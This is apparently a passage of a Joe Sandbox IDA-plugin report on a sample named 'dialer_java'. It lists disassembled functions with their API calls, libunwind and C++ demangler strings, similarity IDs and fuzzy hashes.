Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush$CaptureContextgetenv
String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
API String ID: 3501801798-3031193476
Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction ID: afc2d264f852b62f6b0b3e01289ffe330833388af6764c87bee00310b474df28
Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction Fuzzy Hash: 7081B212B1D24241FA14A76EA80B3B96B59AF52BC4F400039DE4EB73C3DE2FE581424F

Function 00007FF6E3A63820 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fflush.MSVCRT ref: 00007FF6E3A6387D
memcpy.MSVCRT ref: 00007FF6E3A639F9
fflush.MSVCRT ref: 00007FF6E3A63B05
fflush.MSVCRT ref: 00007FF6E3A63B5D
RtlUnwindEx.KERNEL32 ref: 00007FF6E3A63CEA
fflush.MSVCRT ref: 00007FF6E3A63D4A
abort.MSVCRT ref: 00007FF6E3A63D4F

Part of subcall function 00007FF6E3A68A70: getenv.MSVCRT ref: 00007FF6E3A68A93

Strings

CCG , xrefs: 00007FF6E3A63884
_GCC_specific_handler, xrefs: 00007FF6E3A63BA2, 00007FF6E3A63C03, 00007FF6E3A63D05, 00007FF6E3A63D2A
libunwind: %s - %s, xrefs: 00007FF6E3A63B9B, 00007FF6E3A63BFC, 00007FF6E3A63CFE, 00007FF6E3A63D23
libunwind: _GCC_specific_handler(%#010lx(%lx), %p), xrefs: 00007FF6E3A63863
Personality indicated exception handler in phase 2!, xrefs: 00007FF6E3A63D31
RtlUnwindEx() failed, xrefs: 00007FF6E3A63D0C
CCG!, xrefs: 00007FF6E3A63891
Personality continued unwind at the target frame!, xrefs: 00007FF6E3A63BA9
libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p), xrefs: 00007FF6E3A63AE5
libunwind: _GCC_specific_handler() personality returned %d, xrefs: 00007FF6E3A63B40
Personality installed context during phase 1!, xrefs: 00007FF6E3A63C0A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush$Unwindabortgetenvmemcpy
String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
API String ID: 4246679292-2140983942
Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction ID: bc7863c0a9ca55d079812c8c020fa98fd0fe0c5237e64cc7a00b74deb47c2639
Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction Fuzzy Hash: 0AD15C22A18AC281E6359B1DE4063F97BA4FF94784F004139DE8DA37A1DF3EE1968745

Function 00007FF6E3A72BCA Relevance: 31.6, APIs: 21, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF6E3A72BE5
isxdigit.MSVCRT ref: 00007FF6E3A72BF7
isxdigit.MSVCRT ref: 00007FF6E3A72C09
isxdigit.MSVCRT ref: 00007FF6E3A72C1B
isxdigit.MSVCRT ref: 00007FF6E3A72C2D
isxdigit.MSVCRT ref: 00007FF6E3A72C3F
isxdigit.MSVCRT ref: 00007FF6E3A72C51
isxdigit.MSVCRT ref: 00007FF6E3A72C63
isxdigit.MSVCRT ref: 00007FF6E3A72C75
isxdigit.MSVCRT ref: 00007FF6E3A72C87
isxdigit.MSVCRT ref: 00007FF6E3A72C99
isxdigit.MSVCRT ref: 00007FF6E3A72CAB
isxdigit.MSVCRT ref: 00007FF6E3A72CBD
isxdigit.MSVCRT ref: 00007FF6E3A72CCF
isxdigit.MSVCRT ref: 00007FF6E3A72CE1
isxdigit.MSVCRT ref: 00007FF6E3A72CF3
isxdigit.MSVCRT ref: 00007FF6E3A72D05
isxdigit.MSVCRT ref: 00007FF6E3A72D17
isxdigit.MSVCRT ref: 00007FF6E3A72D29
isxdigit.MSVCRT ref: 00007FF6E3A72D3B
malloc.MSVCRT ref: 00007FF6E3A72D88

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction ID: dc9e5287f95094d1e8755021da0bf662a1f3816be4b6b370cf45547e255e8a5c
Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction Fuzzy Hash: 95515023708A8282E7544F38A8E573B2EA1AF44F81F080175CA6DE55D5DF6EE4F5D306

Function 00007FF6E3A77B80 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6E3A77C1B
_assert.MSVCRT ref: 00007FF6E3A780BC

Part of subcall function 00007FF6E3A63F50: fflush.MSVCRT ref: 00007FF6E3A63F8F
Part of subcall function 00007FF6E3A63F50: RtlUnwindEx.KERNEL32 ref: 00007FF6E3A640A6
Part of subcall function 00007FF6E3A63F50: fflush.MSVCRT ref: 00007FF6E3A64106
Part of subcall function 00007FF6E3A63F50: abort.MSVCRT ref: 00007FF6E3A6410B

Strings

Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6E3A780A8
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A780AF
yptn, xrefs: 00007FF6E3A77B80

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush$Unwind_assertabortmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 2460331008-2552725819
Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction ID: 17e6341207715b3a8039c150026c19bb2a97ae1c28bdf7d3c4d0f0a134568745
Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction Fuzzy Hash: F3E1E333719B8185EA24CB19E48A3BA7BA8FB44B80F454135DA8D977D5DF3EE182C305

Function 00007FF6E3A72DF3 Relevance: 25.6, APIs: 17, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF6E3A72E0E
isxdigit.MSVCRT ref: 00007FF6E3A72E20
isxdigit.MSVCRT ref: 00007FF6E3A72E32
isxdigit.MSVCRT ref: 00007FF6E3A72E44
isxdigit.MSVCRT ref: 00007FF6E3A72E56
isxdigit.MSVCRT ref: 00007FF6E3A72E68
isxdigit.MSVCRT ref: 00007FF6E3A72E7A
isxdigit.MSVCRT ref: 00007FF6E3A72E8C
isxdigit.MSVCRT ref: 00007FF6E3A72E9E
isxdigit.MSVCRT ref: 00007FF6E3A72EB0
isxdigit.MSVCRT ref: 00007FF6E3A72EC2
isxdigit.MSVCRT ref: 00007FF6E3A72ED4
isxdigit.MSVCRT ref: 00007FF6E3A72EE6
isxdigit.MSVCRT ref: 00007FF6E3A72EF8
isxdigit.MSVCRT ref: 00007FF6E3A72F0A
isxdigit.MSVCRT ref: 00007FF6E3A72F1C
malloc.MSVCRT ref: 00007FF6E3A72F69

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction ID: 8dc01b65e07d99631029e2b749e94af8a5b29190dc24c0b5d368b26cde054ecf
Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction Fuzzy Hash: D2516323708A8242E7544F38A8E533A6FA1AF44F81F080175CA6DA65D5DF6EE4F1D306

Function 00007FF6E3A782A0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6E3A782E7
realloc.MSVCRT ref: 00007FF6E3A78385
malloc.MSVCRT ref: 00007FF6E3A7839B
memcpy.MSVCRT ref: 00007FF6E3A783B6
_assert.MSVCRT ref: 00007FF6E3A78410
realloc.MSVCRT ref: 00007FF6E3A78476
realloc.MSVCRT ref: 00007FF6E3A784C5
realloc.MSVCRT ref: 00007FF6E3A7851B
realloc.MSVCRT ref: 00007FF6E3A785BE
memcpy.MSVCRT ref: 00007FF6E3A785E0

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A78403
yptn, xrefs: 00007FF6E3A782A0
Last != First && "Calling back() on empty vector!", xrefs: 00007FF6E3A783FC

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
API String ID: 3355138791-4068048850
Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction ID: 30cf324053e77a2a0a705cf1cd444a37772aa29550a17be1cc784e93a3a5c885
Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction Fuzzy Hash: BB91E1B3B05B8282EA25CB09E48A7796BA9EB547C4F448131CF4D97794EF3CE581C305

Function 00007FF6E3A7F790 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF6E3A7F849
realloc.MSVCRT ref: 00007FF6E3A7F8E7
realloc.MSVCRT ref: 00007FF6E3A7F934
realloc.MSVCRT ref: 00007FF6E3A7F989
realloc.MSVCRT ref: 00007FF6E3A7F9E7
memcpy.MSVCRT ref: 00007FF6E3A7FA00
realloc.MSVCRT ref: 00007FF6E3A7FA36
realloc.MSVCRT ref: 00007FF6E3A7FB2C

Strings

c_object, xrefs: 00007FF6E3A7F7CB
c_object, xrefs: 00007FF6E3A7FA98
objc_obj, xrefs: 00007FF6E3A7F7BE
objc_obj, xrefs: 00007FF6E3A7FA8B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID: c_object$c_object$objc_obj$objc_obj
API String ID: 1833655766-1179801904
Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction ID: 337addcbc56010228b2d8a4503044c324e7b98873a31695eccfb9e449d0bcd78
Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction Fuzzy Hash: EEC15EB7B05B8682EE248F1AE4953796BA1EB55FC0F148432CB8D97394DF2DD581C305

Function 00007FF6E3A87F20 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6E3A87F82
memset.MSVCRT ref: 00007FF6E3A88015
wcscpy.MSVCRT ref: 00007FF6E3A8806D
wcscat.MSVCRT ref: 00007FF6E3A88078
wcslen.MSVCRT ref: 00007FF6E3A88089
memset.MSVCRT ref: 00007FF6E3A881A4
wcscpy.MSVCRT ref: 00007FF6E3A88203
wcscat.MSVCRT ref: 00007FF6E3A8820E
wcslen.MSVCRT ref: 00007FF6E3A88222

Strings

@, xrefs: 00007FF6E3A880C1
, xrefs: 00007FF6E3A882AB
0, xrefs: 00007FF6E3A880B6
@, xrefs: 00007FF6E3A88266
0, xrefs: 00007FF6E3A8825B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction ID: a15ec1ce10d61be537783860eacb7ce58bd3e260eef3110cd27650aff47bac04
Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction Fuzzy Hash: E7B1A562A1C7C285F3218B19E80A3BA7BA0FF95344F401135EACDA2655DF7ED186C709

Function 00007FF6E3A7CA90 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6E3A7CC08
memcpy.MSVCRT ref: 00007FF6E3A7CC27
malloc.MSVCRT ref: 00007FF6E3A7CC5B
malloc.MSVCRT ref: 00007FF6E3A7CE46
memcpy.MSVCRT ref: 00007FF6E3A7CE65

Strings

noexcept, xrefs: 00007FF6E3A7CCB3

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpy
String ID: noexcept
API String ID: 3800483350-1409219070
Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction ID: 497ee9cecd49459cca12bba5b537dd8c28c6926de11d3fbb5437323afad41892
Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction Fuzzy Hash: EC02E173709B8286EA608B19E4863797BA4EB44B80F444135DB8E977D9DF3DE492C309

Function 00007FF6E3A87260 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00007FF6E3A87365
memset.MSVCRT ref: 00007FF6E3A8742D
wcscpy.MSVCRT ref: 00007FF6E3A87494
wcscat.MSVCRT ref: 00007FF6E3A8749F
wcslen.MSVCRT ref: 00007FF6E3A874A7
wcslen.MSVCRT ref: 00007FF6E3A874C2
wcslen.MSVCRT ref: 00007FF6E3A87540
wcslen.MSVCRT ref: 00007FF6E3A87592

Strings

0, xrefs: 00007FF6E3A8736A
X, xrefs: 00007FF6E3A87711
`, xrefs: 00007FF6E3A87729

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction ID: 294200a2d58f4bc2d3636bb08d9779d146ec37a5b7c87d8947ba10aaeb81cf1b
Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction Fuzzy Hash: E0028023A18BC281E7208F19E4463AA7BA0FB95754F404236DADDA37E5DF3ED185C705

Function 00007FF6E3A7E230 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7E275
realloc.MSVCRT ref: 00007FF6E3A7E2DB
realloc.MSVCRT ref: 00007FF6E3A7E337
realloc.MSVCRT ref: 00007FF6E3A7E39F
realloc.MSVCRT ref: 00007FF6E3A7E3FA
realloc.MSVCRT ref: 00007FF6E3A7E45A
realloc.MSVCRT ref: 00007FF6E3A7E4C5
realloc.MSVCRT ref: 00007FF6E3A7E513
realloc.MSVCRT ref: 00007FF6E3A7E56F

Strings

restric, xrefs: 00007FF6E3A7E46F
volatil, xrefs: 00007FF6E3A7E40F

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction ID: 2376b836ec261bd654be748e834fbeebe01f8c35ee83a166832c189813d14136
Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction Fuzzy Hash: D2B1A3B3B05B8682DA28CF5AE58536DB761EB94BC4F008531CB8E577A4EF3DE4818305

Function 00007FF6E3A79ED0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A79EFC
realloc.MSVCRT ref: 00007FF6E3A79FEC
realloc.MSVCRT ref: 00007FF6E3A7A06C
realloc.MSVCRT ref: 00007FF6E3A7A0E6
realloc.MSVCRT ref: 00007FF6E3A7A146
realloc.MSVCRT ref: 00007FF6E3A7A191
realloc.MSVCRT ref: 00007FF6E3A7A1D2
memcpy.MSVCRT ref: 00007FF6E3A7A1EC
realloc.MSVCRT ref: 00007FF6E3A7A224

Strings

set , xrefs: 00007FF6E3A7A08F
at offs, xrefs: 00007FF6E3A7A081

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID: at offs$set
API String ID: 1059646398-2369781007
Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
